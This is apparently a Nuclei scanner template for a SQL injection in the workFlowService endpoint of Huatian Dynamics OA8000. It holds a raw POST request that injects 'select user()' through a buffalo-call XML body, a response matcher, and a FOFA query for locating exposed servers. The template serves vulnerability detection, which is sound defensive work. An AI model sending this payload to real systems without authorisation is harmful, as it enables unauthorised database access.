id: cnpower-oa-sql-workFlowService

info:
  name: cnpower-oa-sql-workFlowService
  author: p1z
  severity: high
  description: |
    华天动力 oa workFlowService 接口sql注入漏洞
  reference: 
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E5%8D%8E%E5%A4%A9OA/%E5%8D%8E%E5%A4%A9%E5%8A%A8%E5%8A%9BOA%208000%E7%89%88%20workFlowService%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  metadata:
    fofa-query: app="华天动力-OA8000"
    hunter-query:
    verified: true
  tags: 2022,cnpower,oa,sql

http:
  - raw:
      - |
        POST /OAapp/bfapp/buffalo/workFlowService HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36
        Connection: close
        Content-Length: 100
        Accept-Encoding: gzip, deflate
        Accept: */*

        <buffalo-call> 
        <method>getDataListForTree</method> 
        <string>select user()</string> 
        </buffalo-call>

    matchers:
      - type: word
        part: body
        words:
          - 'user'